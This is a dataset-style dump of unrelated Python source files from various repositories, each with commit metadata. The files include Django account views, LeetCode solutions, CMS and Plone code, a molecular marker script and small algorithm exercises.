return float(self.tick) / GlowComponent.HALF_CYCLE
else:
diff = self.tick - GlowComponent.HALF_CYCLE
mod = GlowComponent.HALF_CYCLE - diff
return float(mod) / GlowComponent.HALF_CYCLE
def interpolate_colors(self, (br, bg, bb), (tr, tg, tb), percent):
diff_r = int((tr - br) * percent)
diff_g = int((tg - bg) * percent)
diff_b = int((tb - bb) * percent)
return diff_r + br, diff_g + bg, diff_b + bb
| [
"marzecsean@gmail.com"
] | marzecsean@gmail.com |
42daabc1053796acc91a604a7c3bee3508786c64 | 15302e92957f4824aa37b9ae524f36ca99f74b2e | /accounts/views.py | 7db5acd621b1455666a8b8c2ea6a045899d6faab | [] | no_license | extremesystems/Shakal-NG | 4bc76893d1fd486681b6364d4bb306b02e348ce4 | 40b4f5e70feb3f0f5ef4432b273eb09387232d3d | refs/heads/master | 2020-12-25T10:36:34.227509 | 2013-09-22T12:52:34 | 2013-09-22T12:52:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,262 | py | # -*- coding: utf-8 -*-
from datetime import datetime
from time import mktime
from auth_remember import remember_user
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.decorators import login_required
from django.contrib.auth.signals import user_logged_in
from django.contrib.auth.views import login as login_view
from django.contrib.sites.models import get_current_site
from django.core import signing
from django.core.mail import send_mail
from django.core.urlresolvers import reverse, reverse_lazy
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.template.loader import render_to_string
from django.template.response import TemplateResponse
from django.utils import timezone
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _, ugettext
from django.views.generic import RedirectView, UpdateView
from forms import ProfileEditForm, EmailChangeForm
def login(*args, **kwargs):
return login_view(*args, **kwargs)
def profile(request, pk):
user = get_object_or_404(get_user_model(), pk = pk)
user_table = (
{'name': _('user name'), 'value': user.username, 'class': 'nickname'},
{'name': _('full name'), 'value': user.first_name + ' ' + user.last_name, 'class': 'fn'},
{'name': _('signature'), 'value': mark_safe(user.signature), 'class': ''},
{'name': _('linux distribution'), 'value': user.distribution, 'class': 'note'},
{'name': _('year of birth'), 'value': user.year},
)
if user_table[1]['value'] == ' ':
user_table[1]['value'] = ''
if user.display_mail:
email = user.email.replace('@', ' ' + ugettext('ROLLMOP') + ' ').replace('.', ' ' + ugettext('DOT') + ' ')
user_table = user_table + ({'name': _('e-mail'), 'value': email}, )
context = {
'user_table': user_table,
'user_profile': user,
'is_my_profile': request.user == user,
}
return TemplateResponse(request, "registration/profile.html", RequestContext(request, context))
@login_required
def my_profile(request):
return profile(request, request.user.pk)
@login_required
def email_change(request):
if request.method == 'GET':
form = EmailChangeForm(initial = {'email': request.user.email})
else:
form = EmailChangeForm(request.POST)
if form.is_valid():
if form.cleaned_data['email'] == request.user.email:
return HttpResponseRedirect(reverse('auth_my_profile'))
else:
signer = signing.Signer()
email = form.cleaned_data['email']
signed = signer.sign(str(request.user.pk) + '.' + str(int(mktime(timezone.now().timetuple()))) + '.' + email)
context_data = {
'email': signed,
'site': get_current_site(request),
'activate_link': request.build_absolute_uri(reverse('auth_email_change_activate', args = (signed,))),
}
context = RequestContext(request, context_data)
email_subject = render_to_string("registration/email_change_subject.txt", context).rstrip("\n")
email_body = render_to_string("registration/email_change.txt", context)
send_mail(email_subject, email_body, settings.DEFAULT_FROM_EMAIL, [email])
return HttpResponseRedirect(reverse('auth_email_change_done'))
return TemplateResponse(request, "registration/email_change_form.html", {'form': form})
@login_required
def email_change_done(request):
return TemplateResponse(request, "registration/email_change_done.html")
@login_required
def email_change_activate(request, email):
class UserInputError(ValueError):
pass
context = {
'validlink': True,
}
try:
signer = signing.Signer()
email_data = signer.unsign(email)
user_id, timestamp, email = email_data.split('.', 2)
user = get_user_model().objects.get(pk = int(user_id))
if user != request.user:
raise ValueError
time = timezone.make_aware(datetime.utcfromtimestamp(int(timestamp)), timezone = timezone.utc)
if ((timezone.now() - time).days) > 14:
raise UserInputError(_("Link expired."))
if get_user_model().objects.filter(email = email).exclude(pk = user.pk).count() > 0:
raise UserInputError(_("E-mail address is already in use."))
user.email = email
user.save()
except UserInputError as e:
context['validlink'] = False
context['error_message'] = e.message
except (signing.BadSignature, ValueError, get_user_model().DoesNotExist) as e:
context['validlink'] = False
return TemplateResponse(request, "registration/email_change_complete.html", context)
@login_required
def my_profile_edit(request):
return profile_edit(request, request.user.pk)
def profile_edit(request, pk):
user = get_object_or_404(get_user_model(), pk = pk)
return ProfileEditView.as_view()(request, pk = user.pk)
class ProfileEditView(UpdateView):
form_class = ProfileEditForm
model = get_user_model()
template_name = 'registration/profile_change.html'
def get_success_url(self):
return reverse('auth_my_profile')
user_zone = login_required(RedirectView.as_view(url = reverse_lazy('auth_my_profile')))
def remember_user_handle(sender, request, user, **kwargs):
if user.is_authenticated() and request.POST.get('remember_me', False):
remember_user(request, user)
user_logged_in.connect(remember_user_handle, sender = get_user_model())
| [
"miroslav.bendik@gmail.com"
] | miroslav.bendik@gmail.com |
8c52eb808bb173ab14c7a1d035b74b057d83996a | 0e0f90024d09ff67bcc1b6608a52b0f9ea11fcc4 | /1st_100_questions/LargestperimeterTriangle.py | bcd386f5321df704e8c85a7f5374c0c33b6f7ca0 | [] | no_license | newbieeashish/LeetCode_Algo | ffd7122018ad38b890bf96ceb40c75506fb3d3e1 | 3afaaec3c54787e4646d1472d3f6e7188fb6aec5 | refs/heads/master | 2022-12-14T22:38:04.433700 | 2020-09-17T16:42:03 | 2020-09-17T16:42:03 | 288,243,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | '''
Given an array A of positive lengths, return the largest perimeter of a
triangle with non-zero area, formed from 3 of these lengths.
If it is impossible to form any triangle of non-zero area, return 0.
Example 1:
Input: [2,1,2]
Output: 5
Example 2:
Input: [1,2,1]
Output: 0
Example 3:
Input: [3,2,3,4]
Output: 10
Example 4:
Input: [3,6,2,3]
Output: 8
'''
def LargestPerimeterTriangle(A):
A.sort(reverse=True)
#
i = 0
while i < len(A) - 2:
# check if A[i] >= A[i+1] >= A[i+2] can form a valid triangle
if A[i] < (A[i+1] + A[i+2]):
return(A[i] + A[i+1] + A[i+2])
i += 1
return(0)
print(LargestPerimeterTriangle([3,6,2,3])) | [
"noreply@github.com"
] | newbieeashish.noreply@github.com |
04bf71b28a823eca83b966aba030e7c3bbab0727 | 14373275670c1f3065ce9ae195df142146e2c1a4 | /stubs/influxdb-client/influxdb_client/domain/measurement_schema_list.pyi | c040b8274502414bdf54a289a3329e40f92554ca | [
"Apache-2.0",
"MIT"
] | permissive | sobolevn/typeshed | eb7af17c06a9722f23c337e6b9a4726223155d58 | d63a82640390a9c130e0fe7d409e8b0b836b7c31 | refs/heads/master | 2023-08-04T05:59:29.447015 | 2023-06-14T21:27:53 | 2023-06-14T21:27:53 | 216,265,622 | 2 | 0 | Apache-2.0 | 2022-02-08T10:40:53 | 2019-10-19T20:21:25 | Python | UTF-8 | Python | false | false | 508 | pyi | from _typeshed import Incomplete
class MeasurementSchemaList:
openapi_types: Incomplete
attribute_map: Incomplete
discriminator: Incomplete
def __init__(self, measurement_schemas: Incomplete | None = None) -> None: ...
@property
def measurement_schemas(self): ...
@measurement_schemas.setter
def measurement_schemas(self, measurement_schemas) -> None: ...
def to_dict(self): ...
def to_str(self): ...
def __eq__(self, other): ...
def __ne__(self, other): ...
| [
"noreply@github.com"
] | sobolevn.noreply@github.com |
e4c391d3b6e866523a631ef0612b77f9ee83c8f0 | eefff1251b2807a2a96748f9369336d5cff5622f | /website/apps/cms/plugins/flash/cms_plugins.py | 3a7842ed1e8bb1293ab68e7fb6c85860be311a89 | [] | no_license | tximikel/pinax-satchmo-buildout | 8d669280c5da47315bbfb96d2797a8c7a1d682b5 | 1e2b8d77fdfc538bd3cb483aa0e549af4e952aa1 | refs/heads/master | 2021-01-16T01:27:09.320052 | 2009-09-15T23:36:33 | 2009-09-15T23:36:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 665 | py | from cms.plugin_pool import plugin_pool
from cms.plugin_base import CMSPluginBase
from django.utils.translation import ugettext_lazy as _
from models import Flash
from django.template.loader import render_to_string
from django.utils.safestring import mark_safe
from cms.plugins.flash.forms import FlashForm
class FlashPlugin(CMSPluginBase):
model = Flash
name = _("Flash")
form = FlashForm
render_template = "cms/plugins/flash.html"
def render(self, context, instance, placeholder):
context.update({
'object': instance,
})
return context
plugin_pool.register_plugin(FlashPlugin) | [
"harley@harley-desktop.(none)"
] | harley@harley-desktop.(none) |
5dfadd0ce45da68215a76c87b5ea34b22ff7c046 | 449da7b08bb82654028967aa0fa8efce8b2b10d2 | /adapter/sites/open/blueking/tests/test_utils.py | cb3cafb4a70dfb7eafbd0a1c3739411cac218684 | [] | no_license | sdgdsffdsfff/bk-dop | f1ae15f858f6236405e50e9453554026d2bcfd21 | 97cfac2ba94d67980d837f0b541caae70b68a595 | refs/heads/master | 2023-08-31T22:24:30.616269 | 2021-10-19T17:56:36 | 2021-10-19T17:56:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 829 | py | # -*- coding: utf-8 -*-
from django.test import TestCase
from blueking.component.utils import get_signature
class TestUtils(TestCase):
def test_get_signature(self):
params = {
'method': 'GET',
'path': '/blueking/component/',
'app_secret': 'test',
'params': {'p1': 1, 'p2': 'abc'},
}
signature = get_signature(**params)
self.assertEqual(signature, 'S73XVZx3HvPRcak1z3k7jUkA7FM=')
params = {
'method': 'POST',
'path': '/blueking/component/',
'app_secret': 'test',
'data': {'p1': 1, 'p2': 'abc'},
}
# python3 could sort the dict
signature = get_signature(**params)
self.assertIn(signature, ['qTzporCDYXqaWKuk/MNUXPT3A5U=', 'PnmqLk/8PVpsLHDFkolCQoi5lmg='])
| [
"1297650644@qq.com"
] | 1297650644@qq.com |
14ef745c146208d2df666127b33858c6be7b7e28 | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog_tags/initial_9549.py | 45f1b9acca999586745f601672e163547da344a4 | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,328 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog1_Anch" not in marker_sets:
s=new_marker_set('Cog1_Anch')
marker_sets["Cog1_Anch"]=s
s= marker_sets["Cog1_Anch"]
mark=s.place_marker((126, 38, 103), (0, 0, 1), 21.9005)
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((591, 364, 713), (1, 0.5, 0), 21.9005)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((858, 422, 729), (1, 0.5, 0), 21.9005)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((810, 97, 293), (1, 0.5, 0), 21.9005)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((825, 997, 101), (1, 0.87, 0), 21.9005)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((938, 390, 276), (1, 0.87, 0), 21.9005)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((643, 164, 956), (1, 0.87, 0), 21.9005)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((127, 77, 956), (0.97, 0.51, 0.75), 21.9005)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((289, 389, 770), (0.97, 0.51, 0.75), 21.9005)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((207, 852, 717), (0.97, 0.51, 0.75), 21.9005)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((614, 524, 34), (0.39, 0.31, 0.14), 21.9005)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((8, 47, 666), (0.39, 0.31, 0.14), 21.9005)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((493, 644, 706), (0.39, 0.31, 0.14), 21.9005)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((809, 721, 927), (0.6, 0.31, 0.64), 21.9005)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((652, 818, 12), (0.6, 0.31, 0.64), 21.9005)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((954, 392, 878), (0.6, 0.31, 0.64), 21.9005)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((50, 511, 573), (0.89, 0.1, 0.1), 21.9005)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((120, 516, 982), (0.89, 0.1, 0.1), 21.9005)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((885, 733, 538), (0.89, 0.1, 0.1), 21.9005)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((880, 949, 627), (0.3, 0.69, 0.29), 21.9005)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((838, 343, 909), (0.3, 0.69, 0.29), 21.9005)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"batxes@gmail.com"
] | batxes@gmail.com |
9148c4700e17b1eaf522d5d491ca64143dd99ec5 | 4382c60f18aba351a2e7cdab7ce2793c2d27717c | /Algorithm 190821 holefly/maze.py | 12f18e9fb2494b562c1a9664481cda999c37fabd | [] | no_license | vxda7/pycharm | e550b1db4cabe1a0fa03e140f33b028ef08bd4cb | ce29f682a923875b62a8c7c0102790eef11ab156 | refs/heads/master | 2020-07-03T11:27:27.807096 | 2019-11-15T08:50:32 | 2019-11-15T08:50:32 | 201,891,357 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,261 | py | import sys
sys.stdin = open("sample_input.txt", "r")
def find(scol, srow):
global maze
global N
dl = [0, 1, 0, -1]
dr = [1, 0, -1, 0]
queue = []
visited = [[0] * N for _ in range(N)]
queue.append([scol, srow])
visited[scol][srow] = 1
while len(queue) != 0:
n = queue.pop(0)
for i in range(4):
ndl = n[0] + dl[i]
ndr = n[1] + dr[i]
if ndl >= 0 and ndl < N and ndr >= 0 and ndr < N: # 미로안에 있는가
if maze[ndl][ndr] == 3: # 3이면 반환
return visited[n[0]][n[1]] - 1
elif maze[ndl][ndr] != 1 and visited[ndl][ndr] == 0: # 1이 아니고 방문을 안했다면
queue.append([ndl, ndr])
visited[ndl][ndr] += 1 + visited[n[0]][n[1]]
return 0
# def bfs(i, j , N):
# global maze
# di = [0, 1, 0, -1]
# dj = [1, 0, -1, 0]
# # 초기화
# q=[] #큐생성
# visited = [[0]*N for _ in range(N)] #visited 생성
# q.append([i, j]) # 시작점 인큐
# visited[i][j] = 1 # 시작점 방문표시
#
# # 탐색
# while len(q) != 0: # 큐가 비어있지 않으면 반복
# n = q.pop(0) # 디큐
# i, j = n[0], n[1]
# if maze[i][j] == 3: # visit()
# print(visited)
# return visited[i][j] - 2
# # i, j에 인접하고 방문하지 않은 칸을 인큐
# for k in range(4):
# ni = i + di[k]
# nj = j + dj[k]
# if ni >= 0 and ni < N and nj >= 0 and nj < N: # 미로를 벗어나지 않고
# if maze[ni][nj] != 1 and visited[ni][nj] == 0: # 벽이아니고, 방문하지 않은 칸이면
# q.append([ni, nj]) # 인큐
# visited[ni][nj] += 1 + visited[i][j] # 방문 표시
#
# return 0
test_case = int(input())
for case in range(1, test_case + 1):
N = int(input())
maze = []
for i in range(N):
get = list(map(int,list(input())))
maze.append(get)
if 2 in get:
scol = i
srow = get.index(2)
result = find(scol, srow)
# result = bfs(scol, srow, N)
print("#{} {}".format(case, result))
| [
"vxda77@gmail.com"
] | vxda77@gmail.com |
a7ef82ec99d2dabda3ce6ccfe98cbfd0a087bfa6 | 61f9553eedc2ec936ea87f06da5b986091e3b8ff | /workspace/buildout-cache/eggs/plone.scale-1.3.2-py2.7.egg/plone/scale/tests/test_storage.py | 21725c874ed3e430c1fe7398bda865efc9f11528 | [] | no_license | gruhter/gso | 47880b055455cc99d63eec72498048c857e7831b | c0eb949f8a06aab6b97329d51a6d046e2fc0a653 | refs/heads/master | 2016-09-01T18:28:05.589620 | 2015-05-14T19:38:18 | 2015-05-14T19:38:18 | 35,579,298 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,910 | py | from unittest import TestCase
from operator import itemgetter, setitem, delitem
class AnnotationStorageTests(TestCase):
@property
def storage(self):
from plone.scale.storage import AnnotationStorage
storage = AnnotationStorage(None)
storage.modified = lambda: 42
storage.storage = {}
return storage
def factory(self, **kw):
return 'some data', 'png', (42, 23)
def testInterface(self):
from plone.scale.storage import IImageScaleStorage
storage = self.storage
self.failUnless(IImageScaleStorage.providedBy(storage))
def testScaleForNonExistingScaleWithCreation(self):
storage = self.storage
scale = storage.scale(factory=self.factory, foo=23, bar=42)
self.failUnless('uid' in scale)
self.failUnless('key' in scale)
self.assertEqual(scale['data'], 'some data')
self.assertEqual(scale['width'], 42)
self.assertEqual(scale['height'], 23)
self.assertEqual(scale['mimetype'], 'image/png')
def testScaleForNonExistingScaleWithoutCreation(self):
storage = self.storage
scale = storage.scale(foo=23, bar=42)
self.assertEqual(scale, None)
def testScaleForExistingScale(self):
storage = self.storage
scale1 = storage.scale(factory=self.factory, foo=23, bar=42)
scale2 = storage.scale(factory=self.factory, bar=42, foo=23)
self.failUnless(scale1 is scale2)
self.assertEqual(len(storage), 2)
def testScaleForSimilarScales(self):
storage = self.storage
scale1 = storage.scale(factory=self.factory, foo=23, bar=42)
scale2 = storage.scale(factory=self.factory, bar=42, foo=23, hurz='!')
self.failIf(scale1 is scale2)
self.assertEqual(len(storage), 4)
def testGetItem(self):
storage = self.storage
scale = storage.scale(factory=self.factory, foo=23, bar=42)
uid = scale['uid']
scale = storage[uid]
self.failUnless('uid' in scale)
self.failUnless('key' in scale)
self.assertEqual(scale['data'], 'some data')
self.assertEqual(scale['width'], 42)
self.assertEqual(scale['height'], 23)
self.assertEqual(scale['mimetype'], 'image/png')
def testGetUnknownItem(self):
storage = self.storage
self.assertRaises(KeyError, itemgetter('foo'), storage)
def testSetItemNotAllowed(self):
storage = self.storage
self.assertRaises(RuntimeError, setitem, storage, 'key', None)
def testIterateWithoutAnnotations(self):
storage = self.storage
self.assertEqual(list(storage), [])
def testIterate(self):
storage = self.storage
storage.storage.update(one=None, two=None)
generator = iter(storage)
self.assertEqual(set(generator), set(['one', 'two']))
def testKeys(self):
storage = self.storage
storage.storage.update(one=None, two=None)
self.failUnless(isinstance(storage.keys(), list))
self.assertEqual(set(storage.keys()), set(['one', 'two']))
def testNegativeHasKey(self):
storage = self.storage
self.assertEqual(storage.has_key('one'), False)
def testPositiveHasKey(self):
storage = self.storage
storage.storage.update(one=None)
self.assertEqual(storage.has_key('one'), True)
def testDeleteNonExistingItem(self):
storage = self.storage
self.assertRaises(KeyError, delitem, storage, 'foo')
def testDeleteRemovesItemAndIndex(self):
storage = self.storage
scale = storage.scale(factory=self.factory, foo=23, bar=42)
self.assertEqual(len(storage), 2)
del storage[scale['uid']]
self.assertEqual(len(storage), 0)
def test_suite():
from unittest import defaultTestLoader
return defaultTestLoader.loadTestsFromName(__name__)
| [
"gso@abv.bg"
] | gso@abv.bg |
1e69296fbfffb99ccc5b1dbd9d7b72ffe89f647c | 0c1cf007f9d5d00ceefaf7be57e3f81c1c49fb11 | /lightning_asr/vocabs/vocab.py | 17fabbd392c30c01608d1d345c8c6597f8a21c1f | [
"MIT"
] | permissive | sooftware/lightning-asr | f345f34dce132a6ccdb393b74c1f9bf0e1ccaac8 | 3b4d8222fad15c90a8c9b44ecacd67f309b34124 | refs/heads/main | 2023-04-30T17:46:21.737471 | 2021-05-19T11:56:33 | 2021-05-19T11:56:33 | 357,467,261 | 16 | 5 | MIT | 2021-05-12T14:22:05 | 2021-04-13T07:46:44 | Python | UTF-8 | Python | false | false | 1,539 | py | # MIT License
#
# Copyright (c) 2021 Soohwan Kim
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
class Vocabulary(object):
"""
Note:
Do not use this class directly, use one of the sub classes.
"""
def __init__(self, *args, **kwargs):
self.sos_id = None
self.eos_id = None
self.pad_id = None
self.blank_id = None
self.vocab_size = None
def __len__(self):
return self.vocab_size
def label_to_string(self, labels):
raise NotImplementedError
| [
"sooftware@Soohwanui-MacBookPro.local"
] | sooftware@Soohwanui-MacBookPro.local |
79fef1c980fcdf38f5a02fdcb06e729cab57c0de | e5baa5ba65c5cb80b38203b28c064a475aa63693 | /WebContent/mod/topic/new_topic.py | 4897608329e28377dddb01bf792972cf897abd83 | [] | no_license | yxxcrtd/jitar2012 | bbe00b1eb2e505400dcfec396201752c3888199c | ccae07ff44a3cb9dc3d0b75673cbca699fa66b80 | refs/heads/master | 2020-05-31T15:26:40.107486 | 2019-06-05T08:05:22 | 2019-06-05T08:05:22 | 190,352,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,552 | py | #encoding=utf-8
from java.util import Date
from java.util import HashMap
from java.lang import String
from common_data import CommonData
from cn.edustar.jitar.pojos import PlugInTopic
class new_topic(CommonData):
def __init__(self):
CommonData.__init__(self)
def execute(self):
if self.parentGuid == "" or self.parentType == "":
self.addActionError(u"无效的访问。")
return self.ERROR
if self.loginUser == None:
self.addActionError(u"请先登录。")
return self.LOGIN
self.returl = self.params.safeGetStringParam("returl")
if request.getMethod() == "POST":
return self.save_or_update()
map = HashMap()
map.put("SiteUrl", self.pageFrameService.getSiteUrl())
map.put("UserMgrUrl", self.pageFrameService.getUserMgrUrl())
map.put("loginUser", self.loginUser)
map.put("head_nav", "special_subject")
map.put("returl", self.returl)
pagedata = self.pageFrameService.transformTemplate(map, "/WEB-INF/mod/topic/new_topic.ftl")
page_frame = self.pageFrameService.getFramePage(self.parentGuid, self.parentType)
page_frame = page_frame.replace("[placeholder_content]", pagedata)
page_frame = page_frame.replace("[placeholder_title]", u"发起讨论")
self.writeToResponse(page_frame)
def save_or_update(self):
t_title = self.params.safeGetStringParam("ttitle")
t_content = self.params.safeGetStringParam("tcontent")
if t_title == "" or t_content == "":
self.addActionError(u"请输入讨论标题或者讨论内容。")
return self.ERROR
plugInTopic = PlugInTopic()
plugInTopic.setTitle(t_title)
plugInTopic.setCreateDate(Date())
plugInTopic.setCreateUserId(self.loginUser.userId)
plugInTopic.setCreateUserName(self.loginUser.trueName)
plugInTopic.setTopicContent(t_content)
plugInTopic.setAddIp(self.get_client_ip())
plugInTopic.setParentGuid(self.parentGuid)
plugInTopic.setParentObjectType(self.parentType)
self.topic_svc = __spring__.getBean("plugInTopicService")
self.topic_svc.addPluginTopic(plugInTopic)
if self.returl == "":
self.addActionMessage(u"发布成功。")
return self.SUCCESS
else:
response.sendRedirect(self.returl)
| [
"yxxcrtd@gmail.com"
] | yxxcrtd@gmail.com |
21330b565fa24100c359cf64c8463de47eb289ee | 0bc0db1edc610c9f08261c777d06cb1be4b7a524 | /lgp/pythonSpider/ch1/2sequence.py | 456331e43c37d521807a7df0690c84becd95827e | [] | no_license | danpianji/python3.7 | 9bc7f9a765ec76d7d4c5fb413dcdada4f9e8f510 | f66bc7139f9441583b1043d3da11597987e3fbc0 | refs/heads/master | 2020-12-28T14:49:41.410708 | 2019-05-19T10:13:32 | 2019-05-19T10:13:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 273 | py | # -*- coding: UTF-8 -*-
#序列化操作
try:
import cPickle as pickle
except:
import pickle
dict = {"name":"lgp", "age":20, "sex":'M'}
str = pickle.dumps(dict)
print str
dict2 = pickle.loads(str)
print dict2
#也可以将序列化的字符串写入文件存储 | [
"liguangpei1@163.com"
] | liguangpei1@163.com |
bcb656a6cc79492be26ef9deb258a8808e3aa15d | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /58DYAThA2dxnAsMpL_16.py | 61ef3bf2cf1af1f68ed181455ccc260b229bfe59 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | """
Create a function which returns a list of _booleans_ , from a given number.
Iterating through the number one digit at a time, append `True` if the digit
is 1 and `False` if it is 0.
### Examples
integer_boolean("100101") ➞ [True, False, False, True, False, True]
integer_boolean("10") ➞ [True, False]
integer_boolean("001") ➞ [False, False, True]
### Notes
Expect numbers with 0 and 1 only.
"""
def integer_boolean(n):
A=[]
for i in n:
if (i=="0"):
A.append(False)
else:
A.append(True)
return A
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
a01572aa4eb23712a34425bf2c293005f7247ea3 | 304e75224229786ba64c6ef2124007c305019b23 | /src/easy/test_make_two_arrays_equal_by_reversing_sub_arrays.py | 00f2070eb7ce459d4e058cc5a5255feacc815c15 | [] | no_license | Takuma-Ikeda/other-LeetCode | 9179a8100e07d56138fd3f3f626951195e285da2 | 499616d07011bee730b9967e9861e341e62d606d | refs/heads/master | 2023-04-14T06:09:35.341039 | 2023-04-10T02:29:18 | 2023-04-10T02:29:18 | 226,260,312 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 897 | py | import unittest
from answer.make_two_arrays_equal_by_reversing_sub_arrays import Solution
class TestSolution(unittest.TestCase):
def setUp(self):
self.target = [
[1, 2, 3, 4],
[7],
[1, 12],
[3, 7, 9],
[1, 1, 1, 1, 1],
]
self.arr = [
[2, 4, 1, 3],
[7],
[12, 1],
[3, 7, 11],
[1, 1, 1, 1, 1],
]
self.answers = [
True,
True,
True,
False,
True,
]
def test_solution(self):
for i in range(len(self.answers)):
print('----- TEST NO.%i START -----' % i)
s = Solution()
result = s.canBeEqual(self.target[i], self.arr[i])
self.assertEqual(self.answers[i], result)
if __name__ == "__main__":
unittest.main()
| [
"el.programdear@gmail.com"
] | el.programdear@gmail.com |
